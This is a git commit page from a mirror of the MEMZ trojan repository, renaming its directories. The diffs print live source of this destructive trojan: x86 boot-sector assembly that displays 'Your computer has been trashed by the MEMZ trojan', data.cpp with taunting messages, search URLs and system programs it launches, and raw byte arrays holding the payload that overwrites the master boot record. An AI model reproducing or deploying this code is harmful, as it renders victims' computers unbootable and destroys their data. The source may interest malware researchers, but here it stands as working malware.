mirrors/MEMZ
Archived
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Renamed main directories

Browse source
This commit is contained in:
Leurak 2017-04-29 13:06:47 +02:00
parent b4c7132a44
commit fac6767fd9
48 changed files with 1192 additions and 1195 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
.gitignore vendored
View file

@ -243,6 +243,6 @@ _Pvt_Extensions
*.mid
*.bat
*.zip
/VCProject/MEMZ.VC.db
*.db
build/
Build/

0
PayloadMBR/Data/Image/Frames/00.png → NyanMBR/Data/Image/Frames/00.png
View file

Side by side Swipe Overlay

Before

Width:  |  Height:  |  Size: 594 B

After

Width:  |  Height:  |  Size: 594 B

0
PayloadMBR/Data/Image/Frames/01.png → NyanMBR/Data/Image/Frames/01.png
View file

Side by side Swipe Overlay

Before

Width:  |  Height:  |  Size: 568 B

After

Width:  |  Height:  |  Size: 568 B

0
PayloadMBR/Data/Image/Frames/02.png → NyanMBR/Data/Image/Frames/02.png
View file

Side by side Swipe Overlay

Before

Width:  |  Height:  |  Size: 617 B

After

Width:  |  Height:  |  Size: 617 B

0
PayloadMBR/Data/Image/Frames/03.png → NyanMBR/Data/Image/Frames/03.png
View file

Side by side Swipe Overlay

Before

Width:  |  Height:  |  Size: 614 B

After

Width:  |  Height:  |  Size: 614 B

0
PayloadMBR/Data/Image/Frames/04.png → NyanMBR/Data/Image/Frames/04.png
View file

Side by side Swipe Overlay

Before

Width:  |  Height:  |  Size: 583 B

After

Width:  |  Height:  |  Size: 583 B

0
PayloadMBR/Data/Image/Frames/05.png → NyanMBR/Data/Image/Frames/05.png
View file

Side by side Swipe Overlay

Before

Width:  |  Height:  |  Size: 587 B

After

Width:  |  Height:  |  Size: 587 B

0
PayloadMBR/Data/Image/Frames/06.png → NyanMBR/Data/Image/Frames/06.png
View file

Side by side Swipe Overlay

Before

Width:  |  Height:  |  Size: 621 B

After

Width:  |  Height:  |  Size: 621 B

0
PayloadMBR/Data/Image/Frames/07.png → NyanMBR/Data/Image/Frames/07.png
View file

Side by side Swipe Overlay

Before

Width:  |  Height:  |  Size: 616 B

After

Width:  |  Height:  |  Size: 616 B

0
PayloadMBR/Data/Image/Frames/08.png → NyanMBR/Data/Image/Frames/08.png
View file

Side by side Swipe Overlay

Before

Width:  |  Height:  |  Size: 576 B

After

Width:  |  Height:  |  Size: 576 B

0
PayloadMBR/Data/Image/Frames/09.png → NyanMBR/Data/Image/Frames/09.png
View file

Side by side Swipe Overlay

Before

Width:  |  Height:  |  Size: 581 B

After

Width:  |  Height:  |  Size: 581 B

0
PayloadMBR/Data/Image/Frames/10.png → NyanMBR/Data/Image/Frames/10.png
View file

Side by side Swipe Overlay

Before

Width:  |  Height:  |  Size: 619 B

After

Width:  |  Height:  |  Size: 619 B

0
PayloadMBR/Data/Image/Frames/11.png → NyanMBR/Data/Image/Frames/11.png
View file

Side by side Swipe Overlay

Before

Width:  |  Height:  |  Size: 614 B

After

Width:  |  Height:  |  Size: 614 B

0
PayloadMBR/Data/Image/Special/01.png → NyanMBR/Data/Image/Special/01.png
View file

Side by side Swipe Overlay

Before

Width:  |  Height:  |  Size: 539 B

After

Width:  |  Height:  |  Size: 539 B

0
PayloadMBR/Data/Image/png2bin.py → NyanMBR/Data/Image/png2bin.py
View file

0
PayloadMBR/Data/Song/README.md → NyanMBR/Data/Song/README.md
View file

0
PayloadMBR/Data/Song/midi2bin.py → NyanMBR/Data/Song/midi2bin.py
View file

0
PayloadMBR/Makefile → NyanMBR/Makefile
View file

0
PayloadMBR/Source/Compressor/compress.c → NyanMBR/Source/Compressor/compress.c
View file

0
PayloadMBR/Source/Stage1/decompress.asm → NyanMBR/Source/Stage1/decompress.asm
View file

38
PayloadMBR/Source/Stage1/main.asm → NyanMBR/Source/Stage1/main.asm
View file

@ -1,20 +1,20 @@
use16
org 0x7c00
compressed: equ 0x7e00
decompressed: equ 0x8E00
%include "decompress.asm" ; Decompress Code & Data
jmp decompressed ; Jump to the decompressed Data, booting the actual Kernel
; Boot sector signature
times 510 - ($ - $$) db 0
dw 0xAA55
; Include the compressed data
comp: incbin "../../Build/stage2-compressed.bin" ; Hardcoded build dir :(
compsize: equ $-comp
; Align it to sectors
;align 512
use16
org 0x7c00
compressed: equ 0x7e00
decompressed: equ 0x8E00
%include "decompress.asm" ; Decompress Code & Data
jmp decompressed ; Jump to the decompressed Data, booting the actual Kernel
; Boot sector signature
times 510 - ($ - $$) db 0
dw 0xAA55
; Include the compressed data
comp: incbin "../../Build/stage2-compressed.bin" ; Hardcoded build dir :(
compsize: equ $-comp
; Align it to sectors
;align 512
times 4096 - ($ - $$) db 0

0
PayloadMBR/Source/Stage2/Animation/Image/drawIntroFrame.asm → NyanMBR/Source/Stage2/Animation/Image/drawIntroFrame.asm
View file

0
PayloadMBR/Source/Stage2/Animation/Image/drawNormalFrame.asm → NyanMBR/Source/Stage2/Animation/Image/drawNormalFrame.asm
View file

0
PayloadMBR/Source/Stage2/Animation/Image/initDrawing.asm → NyanMBR/Source/Stage2/Animation/Image/initDrawing.asm
View file

0
PayloadMBR/Source/Stage2/Animation/countNyan.asm → NyanMBR/Source/Stage2/Animation/countNyan.asm
View file

0
PayloadMBR/Source/Stage2/Animation/displayFrame.asm → NyanMBR/Source/Stage2/Animation/displayFrame.asm
View file

0
PayloadMBR/Source/Stage2/Animation/playNote.asm → NyanMBR/Source/Stage2/Animation/playNote.asm
View file

0
PayloadMBR/Source/Stage2/Interrupts/keyboardHandler.asm → NyanMBR/Source/Stage2/Interrupts/keyboardHandler.asm
View file

0
PayloadMBR/Source/Stage2/Interrupts/timerHandler.asm → NyanMBR/Source/Stage2/Interrupts/timerHandler.asm
View file

0
PayloadMBR/Source/Stage2/Setup/setup.asm → NyanMBR/Source/Stage2/Setup/setup.asm
View file

0
PayloadMBR/Source/Stage2/Setup/setupInterrupts.asm → NyanMBR/Source/Stage2/Setup/setupInterrupts.asm
View file

0
PayloadMBR/Source/Stage2/Setup/setupSpeaker.asm → NyanMBR/Source/Stage2/Setup/setupSpeaker.asm
View file

0
PayloadMBR/Source/Stage2/Setup/setupTimer.asm → NyanMBR/Source/Stage2/Setup/setupTimer.asm
View file

0
PayloadMBR/Source/Stage2/Utils/macros.asm → NyanMBR/Source/Stage2/Utils/macros.asm
View file

0
PayloadMBR/Source/Stage2/Utils/timer.asm → NyanMBR/Source/Stage2/Utils/timer.asm
View file

86
PayloadMBR/Source/Stage2/main.asm → NyanMBR/Source/Stage2/main.asm
View file

@ -1,44 +1,44 @@
; This is where the program starts after decompression
use16
org 0x8E00
%include "Utils/macros.asm"
%include "Setup/setup.asm"
; Everything should be already set up, so the only
; thing we need to do here is to wait for interrupts
haltLoop:
hlt
jmp haltLoop
; Include the interrupt handlers after the loop to
; prevent them from triggering by including the code
%include "Interrupts/timerHandler.asm"
%include "Interrupts/keyboardHandler.asm"
%include "Utils/timer.asm"
%include "Animation/countNyan.asm"
%include "Animation/displayFrame.asm"
%include "Animation/playNote.asm"
; ==============================
; Variables
; ==============================
; ==============================
; Data
; ==============================
frames: incbin "../../Build/frames.bin"
framesLength: equ $-frames
special: incbin "../../Build/special.bin"
specialLength: equ $-special
song: incbin "../../Build/song.bin"
songLength: equ $-song
message: db "Your computer has been trashed by the MEMZ trojan. Now enjoy the Nyan Cat..."
; This is where the program starts after decompression
use16
org 0x8E00
%include "Utils/macros.asm"
%include "Setup/setup.asm"
; Everything should be already set up, so the only
; thing we need to do here is to wait for interrupts
haltLoop:
hlt
jmp haltLoop
; Include the interrupt handlers after the loop to
; prevent them from triggering by including the code
%include "Interrupts/timerHandler.asm"
%include "Interrupts/keyboardHandler.asm"
%include "Utils/timer.asm"
%include "Animation/countNyan.asm"
%include "Animation/displayFrame.asm"
%include "Animation/playNote.asm"
; ==============================
; Variables
; ==============================
; ==============================
; Data
; ==============================
frames: incbin "../../Build/frames.bin"
framesLength: equ $-frames
special: incbin "../../Build/special.bin"
specialLength: equ $-special
song: incbin "../../Build/song.bin"
songLength: equ $-song
message: db "Your computer has been trashed by the MEMZ trojan. Now enjoy the Nyan Cat..."
messageLength: equ $-message

3
PayloadMBR/test.bat
View file

@ -1,3 +0,0 @@
@echo off
set PATH=%PATH%;C:\Program Files\qemu
qemu-system-i386 -s -soundhw pcspk disk.img

0
VCProject/MEMZ.sln → WindowsTrojan/MEMZ.sln
View file

0
VCProject/MEMZ/MEMZ.vcxproj → WindowsTrojan/MEMZ/MEMZ.vcxproj
View file

0
VCProject/MEMZ/MEMZ.vcxproj.filters → WindowsTrojan/MEMZ/MEMZ.vcxproj.filters
View file

600
VCProject/MEMZ/data.cpp → WindowsTrojan/MEMZ/data.cpp
View file

@ -1,301 +1,301 @@
#include "data.h"
#ifndef CLEAN
const unsigned char msg[] = "YOUR COMPUTER HAS BEEN FUCKED BY THE MEMZ TROJAN.\r\n\r\nYour computer won't boot up again,\r\nso use it as long as you can!\r\n\r\n:D\r\n\r\nTrying to kill MEMZ will cause your system to be\r\ndestroyed instantly, so don't try it :D";
#endif
const char *sites[] = {
"http://google.co.ck/search?q=best+way+to+kill+yourself",
"http://google.co.ck/search?q=how+2+remove+a+virus",
"http://google.co.ck/search?q=mcafee+vs+norton",
"http://google.co.ck/search?q=how+to+send+a+virus+to+my+friend",
"http://google.co.ck/search?q=minecraft+hax+download+no+virus",
"http://google.co.ck/search?q=how+to+get+money",
"http://google.co.ck/search?q=bonzi+buddy+download+free",
"http://google.co.ck/search?q=how+2+buy+weed",
"http://google.co.ck/search?q=how+to+code+a+virus+in+visual+basic",
"http://google.co.ck/search?q=what+happens+if+you+delete+system32",
"http://google.co.ck/search?q=g3t+r3kt",
"http://google.co.ck/search?q=batch+virus+download",
"http://google.co.ck/search?q=virus.exe",
"http://google.co.ck/search?q=internet+explorer+is+the+best+browser",
"http://google.co.ck/search?q=facebook+hacking+tool+free+download+no+virus+working+2016",
"http://google.co.ck/search?q=virus+builder+legit+free+download",
"http://google.co.ck/search?q=how+to+create+your+own+ransomware",
"http://google.co.ck/search?q=how+to+remove+memz+trojan+virus",
"http://google.co.ck/search?q=my+computer+is+doing+weird+things+wtf+is+happenin+plz+halp",
"http://google.co.ck/search?q=dank+memz",
"http://google.co.ck/search?q=how+to+download+memz",
"http://google.co.ck/search?q=half+life+3+release+date",
"http://google.co.ck/search?q=is+illuminati+real",
"http://google.co.ck/search?q=montage+parody+making+program+2016",
"http://google.co.ck/search?q=the+memz+are+real",
"http://google.co.ck/search?q=stanky+danky+maymays",
"http://google.co.ck/search?q=john+cena+midi+legit+not+converted",
"http://google.co.ck/search?q=vinesauce+meme+collection",
"http://google.co.ck/search?q=skrillex+scay+onster+an+nice+sprites+midi",
"http://answers.microsoft.com/en-us/protect/forum/protect_other-protect_scanning/memz-malwarevirus-trojan-completely-destroying/268bc1c2-39f4-42f8-90c2-597a673b6b45",
"http://motherboard.vice.com/read/watch-this-malware-turn-a-computer-into-a-digital-hellscape",
"http://play.clubpenguin.com",
"http://pcoptimizerpro.com",
"http://softonic.com",
"calc",
"notepad",
"cmd",
"write",
"regedit",
"explorer",
"taskmgr",
"msconfig",
"mspaint",
"devmgmt.msc",
"control",
"mmc",
};
const size_t nSites = sizeof(sites) / sizeof(void *);
#ifndef CLEAN
const char *msgs[] = {
"YOU KILLED MY TROJAN!\r\nNow you are going to die.",
"REST IN PISS, FOREVER MISS.",
"I WARNED YOU...",
"HAHA N00B L2P G3T R3KT",
"You failed at your 1337 h4x0r skillz.",
"YOU TRIED SO HARD AND GOT SO FAR, BUT IN THE END, YOUR PC WAS STILL FUCKED!",
"HACKER!\r\nENJOY BAN!",
"GET BETTER HAX NEXT TIME xD",
"HAVE FUN TRYING TO RESTORE YOUR DATA :D",
"|\\/|3|\\/|2",
"BSOD INCOMING",
"VIRUS PRANK (GONE WRONG)",
"ENJOY THE NYAN CAT",
"Get dank antivirus m9!",
"You are an idiot!\r\nHA HA HA HA HA HA HA",
"#MakeMalwareGreatAgain",
"SOMEBODY ONCE TOLD ME THE MEMZ ARE GONNA ROLL ME",
"Why did you even tried to kill MEMZ?\r\nYour PC is fucked anyway.",
"SecureBoot sucks.",
"gr8 m8 i r8 8/8",
"Have you tried turning it off and on again?",
"<Insert Joel quote here>",
"Greetings to all GAiA members!",
"Well, hello there. I don't believe we've been properly introduced. I'm Bonzi!",
"'This is everything I want in my computer'\r\n - danooct1 2016",
"'Uh, Club Penguin. Time to get banned!'\r\n - danooct1 2016",
};
const size_t nMsgs = sizeof(msgs) / sizeof(void *);
#endif
const char *sounds[] = {
"SystemHand",
"SystemQuestion",
"SystemExclamation"
};
const size_t nSounds = sizeof(sounds) / sizeof(void *);
#ifndef CLEAN
// Split into 2 parts to save some space.
const unsigned char code1[] = {
0xBB, 0xE0, 0x07, 0x8E, 0xC3, 0x8E, 0xDB, 0xB8, 0x04, 0x02, 0xB9, 0x02,
0x00, 0xB6, 0x00, 0xBB, 0x00, 0x00, 0xCD, 0x13, 0x31, 0xC0, 0x89, 0xC3,
0x89, 0xC1, 0x89, 0xC2, 0xBE, 0x00, 0x00, 0xBF, 0x00, 0x40, 0xAC, 0x81,
0xFE, 0x9E, 0x07, 0x73, 0x35, 0x3C, 0x80, 0x73, 0x03, 0xE9, 0x10, 0x00,
0x24, 0x7F, 0x88, 0xC1, 0xAC, 0xAA, 0xFE, 0xC9, 0x80, 0xF9, 0xFF, 0x75,
0xF7, 0xE9, 0xE2, 0xFF, 0x88, 0xC4, 0xAC, 0x89, 0xC3, 0xAC, 0x89, 0xF2,
0x89, 0xDE, 0x81, 0xC6, 0x00, 0x40, 0x88, 0xC1, 0xAC, 0xAA, 0xFE, 0xC9,
0x80, 0xF9, 0x00, 0x75, 0xF7, 0x89, 0xD6, 0xE9, 0xC4, 0xFF, 0xB0, 0xB6,
0xE6, 0x43, 0xB8, 0x03, 0x10, 0xB3, 0x00, 0xCD, 0x10, 0xBF, 0x00, 0x00,
0xBA, 0xC0, 0x9D, 0xB9, 0x00, 0xB8, 0x8E, 0xC1, 0xB8, 0x00, 0x00, 0xB9,
0xD0, 0x07, 0xF3, 0xAB, 0xBE, 0x9C, 0x9F, 0xBF, 0x00, 0x00, 0xE4, 0x61,
0x0C, 0x03, 0xE6, 0x61, 0xB3, 0x01, 0x52, 0xB4, 0x86, 0xB9, 0x00, 0x00,
0xBA, 0x00, 0x60, 0xCD, 0x15, 0x5A, 0x81, 0xFE, 0xE8, 0x9F, 0x7D, 0x04,
0xAC, 0xB4, 0xF0, 0xAB, 0xFE, 0xCB, 0x80, 0xFB, 0x00, 0x75, 0xE3, 0x56,
0x89, 0xD6, 0xAD, 0x89, 0xC1, 0x80, 0xE4, 0x1F, 0xE6, 0x42, 0x88, 0xE0,
0xE6, 0x42, 0xC0, 0xED, 0x05, 0xC0, 0xE5, 0x02, 0x88, 0xEB, 0x89, 0xF2,
0x5E, 0x81, 0xFA, 0xF4, 0x9D, 0x75, 0xC3, 0xBE, 0x00, 0x40, 0xBF, 0x00,
0x00, 0xB8, 0xE0, 0x07, 0x8E, 0xD8, 0xB8, 0x00, 0xB8, 0x8E, 0xC0, 0xFE,
0xCB, 0xE9, 0x20, 0x00, 0xB0, 0xDC, 0xAA, 0xAC, 0xAA, 0x81, 0xFE, 0xC0,
0x9D, 0x74, 0x42, 0x81, 0xFF, 0xA0, 0x0F, 0x74, 0x03, 0xE9, 0xEC, 0xFF,
0x52, 0xB4, 0x86, 0xB9, 0x01, 0x00, 0xBA, 0x00, 0x60, 0xCD, 0x15, 0x5A,
0xBF, 0x00, 0x00, 0x81, 0xFA, 0x9C, 0x9F, 0x75, 0x03, 0xBA, 0xF4, 0x9D,
0xFE, 0xCB, 0x80, 0xFB, 0x00, 0x75, 0xCD, 0x56, 0x89, 0xD6, 0xAD, 0x89,
0xC1, 0x80, 0xE4, 0x1F, 0xE6, 0x42, 0x88, 0xE0, 0xE6, 0x42, 0xC0, 0xED,
0x05, 0x88, 0xEB, 0x89, 0xF2, 0x5E, 0xE9, 0xB3, 0xFF, 0xBE, 0x00, 0x40,
0xE9, 0xC1, 0xFF
};
const unsigned char code2[] = {
0x55, 0xAA, 0x83, 0x11, 0x11, 0x11, 0x11, 0x00, 0x00, 0x04, 0x00, 0x00,
0x08, 0x00, 0x00, 0x10, 0x00, 0x00, 0x20, 0x00, 0x35, 0x0B, 0x83, 0xF1,
0xF1, 0x11, 0xF1, 0x00, 0x00, 0x4B, 0x00, 0x96, 0x04, 0x80, 0xFF, 0x00,
0x4F, 0x4F, 0x00, 0x9F, 0x4F, 0x00, 0xEA, 0x53, 0x82, 0x1F, 0xF1, 0x1F,
0x01, 0x42, 0x4E, 0x00, 0x4E, 0x50, 0x02, 0x12, 0x1F, 0x83, 0x10, 0x10,
0x10, 0x10, 0x02, 0x50, 0x04, 0x02, 0x50, 0x08, 0x80, 0x10, 0x02, 0x31,
0x1F, 0x83, 0x14, 0x14, 0x14, 0x14, 0x02, 0x80, 0x04, 0x83, 0x44, 0x44,
0x44, 0x44, 0x02, 0x88, 0x04, 0x02, 0x80, 0x0E, 0x87, 0x40, 0x0E, 0xEE,
0xEE, 0xED, 0xED, 0xED, 0xED, 0x02, 0xA2, 0x04, 0x02, 0xA5, 0x05, 0x82,
0xEE, 0xEE, 0x0E, 0x02, 0x60, 0x1E, 0x02, 0x88, 0x08, 0x83, 0x46, 0x46,
0x46, 0x46, 0x02, 0xD8, 0x04, 0x02, 0xD0, 0x0E, 0x8C, 0x00, 0xEE, 0xED,
0xDD, 0xDC, 0xDD, 0xDD, 0xDD, 0xDD, 0xCD, 0xDD, 0xDD, 0xCD, 0x02, 0xF3,
0x04, 0x83, 0xDD, 0xED, 0xEE, 0x00, 0x02, 0xB3, 0x1D, 0x83, 0x66, 0x66,
0x66, 0x66, 0x03, 0x20, 0x04, 0x03, 0x20, 0x08, 0x03, 0x22, 0x0E, 0x81,
0x00, 0xEE, 0x02, 0xFB, 0x05, 0x03, 0x41, 0x04, 0x83, 0xD0, 0x07, 0x07,
0xD0, 0x02, 0xF9, 0x04, 0x84, 0xEE, 0x00, 0x10, 0x07, 0x07, 0x02, 0xB2,
0x1A, 0x83, 0x6E, 0x6E, 0x6E, 0x6E, 0x03, 0x70, 0x04, 0x83, 0xEE, 0xEE,
0xEE, 0xEE, 0x03, 0x78, 0x04, 0x03, 0x70, 0x08, 0x85, 0x00, 0x07, 0x07,
0x00, 0xE0, 0xEE, 0x03, 0x3E, 0x08, 0x8F, 0xCD, 0xDD, 0xDD, 0x00, 0x77,
0x77, 0x77, 0x07, 0xD0, 0xD0, 0xD0, 0xE0, 0x07, 0x77, 0x77, 0x77, 0x03,
0x02, 0x1A, 0x03, 0x78, 0x08, 0x83, 0xEA, 0xEA, 0xEA, 0xEA, 0x03, 0xC8,
0x04, 0x03, 0xC0, 0x08, 0x85, 0x0A, 0x00, 0x70, 0x77, 0x07, 0x00, 0x03,
0x8E, 0x05, 0x02, 0xFA, 0x04, 0x81, 0xDC, 0xD0, 0x03, 0xA2, 0x04, 0x80,
0x77, 0x03, 0xEA, 0x04, 0x03, 0xEE, 0x04, 0x03, 0x55, 0x1A, 0x83, 0xAA,
0xAA, 0xAA, 0xAA, 0x04, 0x10, 0x04, 0x04, 0x10, 0x08, 0x04, 0x16, 0x0A,
0x85, 0x0A, 0x00, 0x70, 0x70, 0x00, 0xEE, 0x02, 0xF9, 0x07, 0x03, 0x98,
0x05, 0x80, 0xF0, 0x04, 0x38, 0x04, 0x80, 0x70, 0x04, 0x3B, 0x05, 0x03,
0xA6, 0x19, 0x83, 0xA3, 0xA3, 0xA3, 0xA3, 0x04, 0x60, 0x04, 0x83, 0x33,
0x33, 0x33, 0x33, 0x04, 0x68, 0x04, 0x04, 0x60, 0x0D, 0x83, 0x03, 0x00,
0xEE, 0xDE, 0x02, 0xF1, 0x04, 0x03, 0x96, 0x07, 0x81, 0x77, 0x70, 0x04,
0x3F, 0x04, 0x04, 0x8C, 0x04, 0x04, 0x46, 0x1A, 0x04, 0x68, 0x08, 0x87,
0x39, 0x39, 0x39, 0x39, 0xF9, 0x39, 0x39, 0x39, 0x04, 0xB0, 0x0C, 0x9A,
0x39, 0x30, 0x00, 0xE0, 0xEE, 0xEE, 0xDE, 0xDE, 0xDE, 0xDE, 0xDE, 0xDE,
0xDE, 0x0E, 0x70, 0x77, 0x77, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07,
0x77, 0x70, 0x01, 0x03, 0xA7, 0x19, 0x83, 0x99, 0x99, 0x99, 0x99, 0x05,
0x00, 0x04, 0x81, 0x99, 0x9F, 0x05, 0x04, 0x06, 0x05, 0x00, 0x09, 0x88,
0x99, 0x99, 0x99, 0x00, 0x77, 0x77, 0x70, 0x00, 0x01, 0x03, 0x88, 0x04,
0x83, 0x01, 0x01, 0x01, 0x01, 0x05, 0x21, 0x06, 0x05, 0x2B, 0x05, 0x03,
0x05, 0x1B, 0x83, 0x91, 0x91, 0x91, 0x91, 0x05, 0x50, 0x04, 0x05, 0x48,
0x10, 0x05, 0x5C, 0x04, 0x05, 0x27, 0x04, 0x05, 0x6A, 0x05, 0x05, 0x59,
0x07, 0x05, 0x6D, 0x07, 0x01, 0xB8, 0x98, 0x00, 0x9F, 0xF1, 0x06, 0x99,
0x73, 0x05, 0xAC, 0x93, 0x07, 0x7F, 0x06, 0x07, 0x7F, 0x4B, 0x82, 0xF1,
0x11, 0x1F, 0x05, 0xAB, 0xFF, 0x08, 0xAA, 0xBB, 0x02, 0x50, 0xF9, 0x03,
0x48, 0x05, 0x03, 0x4E, 0x05, 0x80, 0x11, 0x03, 0x53, 0x1C, 0x03, 0x70,
0x18, 0x84, 0xEE, 0xE0, 0xE0, 0xEE, 0xEE, 0x03, 0x8D, 0x0C, 0x03, 0x98,
0x08, 0x81, 0xE0, 0x00, 0x03, 0xA2, 0x1D, 0x03, 0xC0, 0x18, 0x04, 0x44,
0x04, 0x81, 0xE0, 0xE0, 0x03, 0xDE, 0x0A, 0x80, 0xDD, 0x03, 0xE8, 0x27,
0x04, 0x11, 0x1A, 0x83, 0x70, 0x70, 0x77, 0x77, 0x04, 0x2E, 0x0A, 0x04,
0x37, 0x28, 0x04, 0x60, 0x1C, 0x80, 0x03, 0x04, 0x7D, 0x0B, 0x04, 0x87,
0x28, 0x04, 0xC0, 0x0D, 0x04, 0xBD, 0x10, 0x80, 0x39, 0x04, 0xCE, 0x0B,
0x04, 0xD8, 0x27, 0x05, 0x10, 0x0C, 0x0C, 0xD0, 0x0C, 0x05, 0x17, 0x08,
0x05, 0x20, 0x0B, 0x05, 0x2A, 0x25, 0x05, 0x62, 0x06, 0x80, 0xF1, 0x05,
0x57, 0x15, 0x05, 0x71, 0x07, 0x05, 0x72, 0x11, 0x05, 0x82, 0x2A, 0x05,
0xAD, 0xFF, 0x06, 0xB1, 0xFF, 0x07, 0xB5, 0xAE, 0x81, 0x11, 0x11, 0x01,
0x92, 0x4F, 0x00, 0xDC, 0xB5, 0x0E, 0xFC, 0x9C, 0x00, 0x4B, 0x54, 0x0A,
0x59, 0x15, 0x12, 0x25, 0x0A, 0x84, 0x10, 0x0E, 0x0E, 0x0E, 0x0E, 0x12,
0x40, 0x04, 0x12, 0x40, 0x08, 0x0A, 0x81, 0x1F, 0x80, 0x11, 0x0A, 0xA9,
0x15, 0x12, 0x75, 0x09, 0x83, 0x00, 0xEE, 0xEE, 0xED, 0x0C, 0x04, 0x05,
0x80, 0xDC, 0x0B, 0xB5, 0x04, 0x0A, 0xCD, 0x05, 0x0A, 0xD1, 0x41, 0x0C,
0x01, 0x08, 0x82, 0xDD, 0xD0, 0xD0, 0x12, 0x99, 0x04, 0x12, 0xA1, 0x04,
0x0A, 0x2F, 0x1B, 0x0B, 0x49, 0x10, 0x13, 0x10, 0x0E, 0x0B, 0x5E, 0x08,
0x12, 0x9A, 0x04, 0x80, 0x00, 0x0B, 0x6C, 0x04, 0x03, 0x4F, 0x06, 0x0B,
0x75, 0x1B, 0x0B, 0x99, 0x0F, 0x0B, 0x98, 0x0F, 0x13, 0x2E, 0x05, 0x12,
0x9A, 0x05, 0x0C, 0x57, 0x07, 0x0C, 0xB1, 0x05, 0x0B, 0x74, 0x1C, 0x04,
0x10, 0x1A, 0x82, 0xA0, 0xA0, 0xA0, 0x03, 0xDD, 0x04, 0x13, 0x83, 0x06,
0x80, 0xCD, 0x13, 0x89, 0x05, 0x80, 0x7F, 0x0C, 0x64, 0x04, 0x13, 0xDB,
0x06, 0x0C, 0x68, 0x1F, 0x0C, 0x30, 0x11, 0x0B, 0x72, 0x04, 0x04, 0x2C,
0x05, 0x13, 0x32, 0x0B, 0x80, 0x77, 0x13, 0x91, 0x05, 0x80, 0x07, 0x14,
0x2C, 0x05, 0x13, 0xE8, 0x18, 0x0C, 0x89, 0x15, 0x14, 0x55, 0x04, 0x88,
0x03, 0x03, 0x03, 0x03, 0x33, 0x00, 0xEE, 0xEE, 0xDE, 0x12, 0xE2, 0x07,
0x80, 0x0D, 0x0C, 0x64, 0x05, 0x81, 0x70, 0x70, 0x04, 0x2B, 0x04, 0x80,
0x77, 0x0C, 0xB5, 0x1A, 0x05, 0x0E, 0x0E, 0x0C, 0xDD, 0x11, 0x84, 0x07,
0xE0, 0xE0, 0xE0, 0xE0, 0x14, 0xC0, 0x04, 0x87, 0xE0, 0xE0, 0xE0, 0x00,
0x70, 0x70, 0x70, 0x70, 0x14, 0xCC, 0x04, 0x80, 0x70, 0x04, 0xE5, 0x1B,
0x81, 0xF1, 0x1F, 0x11, 0xCF, 0x05, 0x05, 0x50, 0x17, 0x80, 0x00, 0x14,
0xD4, 0x04, 0x82, 0x01, 0x70, 0x70, 0x14, 0x38, 0x07, 0x15, 0x13, 0x05,
0x15, 0x13, 0x0A, 0x05, 0xAD, 0xFF, 0x0F, 0xE2, 0xE7, 0x0F, 0xD9, 0x93,
0x05, 0xAC, 0xFF, 0x16, 0x23, 0xA0, 0x17, 0xA5, 0x04, 0x08, 0x18, 0x4D,
0x08, 0x14, 0x5B, 0x12, 0x20, 0xFF, 0x13, 0x1F, 0xAD, 0x81, 0x07, 0x07,
0x13, 0xCE, 0x4A, 0x83, 0xA0, 0x07, 0x77, 0x70, 0x14, 0x1C, 0x4C, 0x84,
0x03, 0x70, 0x70, 0x03, 0x33, 0x14, 0x6D, 0x34, 0x14, 0xA2, 0x1C, 0x81,
0x90, 0x07, 0x14, 0xBF, 0x31, 0x05, 0x49, 0x1D, 0x15, 0x0E, 0xFF, 0x18,
0x97, 0xFF, 0x08, 0x15, 0x94, 0x14, 0xF0, 0x07, 0x05, 0xAD, 0xFF, 0x16,
0x2D, 0xFF, 0x20, 0x84, 0x4C, 0x0A, 0x50, 0x1E, 0x81, 0x44, 0x40, 0x1A,
0x10, 0x30, 0x0A, 0xA0, 0x20, 0x1A, 0x60, 0x5A, 0x81, 0xD0, 0xD0, 0x22,
0x38, 0x05, 0x0B, 0x21, 0x04, 0x21, 0xF1, 0x1B, 0x0B, 0x40, 0x19, 0x1B,
0x49, 0x0A, 0x22, 0x34, 0x06, 0x1B, 0x0A, 0x07, 0x81, 0xDD, 0xEE, 0x14,
0x18, 0x04, 0x03, 0xA6, 0x31, 0x81, 0xE0, 0x07, 0x03, 0x89, 0x04, 0x0B,
0xAD, 0x06, 0x1B, 0xA1, 0x06, 0x1B, 0x5A, 0x26, 0x1B, 0x7F, 0x18, 0x81,
0x0A, 0x0A, 0x1C, 0xA2, 0x04, 0x1B, 0x9D, 0x0B, 0x1B, 0xA9, 0x27, 0x0C,
0x2F, 0x21, 0x22, 0xD1, 0x0B, 0x1B, 0xFC, 0x24, 0x0C, 0x7F, 0x1E, 0x80,
0x30, 0x1C, 0x3E, 0x0A, 0x1C, 0x49, 0x27, 0x1C, 0x6F, 0x1C, 0x80, 0x90,
0x23, 0x18, 0x06, 0x1C, 0x93, 0x2E, 0x05, 0x50, 0x1B, 0x15, 0x0E, 0xFF,
0x10, 0xD9, 0xF8, 0x80, 0xF1, 0x26, 0x50, 0x4D, 0x00, 0x9E, 0x47, 0x82,
0xF1, 0xF1, 0x1F, 0x26, 0xA2, 0x4E, 0x05, 0xAB, 0xFF, 0x06, 0xE0, 0xFF,
0x21, 0xB6, 0xD3, 0x03, 0x49, 0x05, 0x22, 0x8E, 0x05, 0x03, 0x53, 0x35,
0x0B, 0x58, 0x0E, 0x23, 0xC5, 0x08, 0x03, 0x9E, 0x3A, 0x0B, 0xA8, 0x0B,
0x2A, 0x0A, 0x05, 0x03, 0xE8, 0x41, 0x0B, 0xF9, 0x08, 0x23, 0x71, 0x0B,
0x04, 0x3C, 0x40, 0x23, 0xBC, 0x10, 0x04, 0x8C, 0x30, 0x23, 0xFC, 0x1C,
0x24, 0x17, 0x05, 0x0C, 0xAE, 0x22, 0x80, 0x1F, 0x24, 0x40, 0x1D, 0x80,
0x77, 0x24, 0x5E, 0x0C, 0x86, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x0C, 0xF4, 0x04, 0x29, 0x0C, 0x1B, 0x24, 0x90, 0x20, 0x2C, 0x7B, 0x05,
0x2C, 0x6B, 0x05, 0x24, 0xAB, 0x0F, 0x00, 0x38, 0xFF, 0x2D, 0x19, 0x7F,
0x2C, 0xFF, 0x4E, 0x27, 0x37, 0x98, 0x26, 0x9D, 0x9A, 0x05, 0xAD, 0xFF,
0x25, 0xF5, 0x5A, 0x1F, 0x6F, 0x40, 0x0A, 0x20, 0x30, 0x19, 0xF0, 0x1E,
0x80, 0x10, 0x0A, 0x6F, 0x31, 0x1A, 0x40, 0x20, 0x02, 0xF0, 0x80, 0x1A,
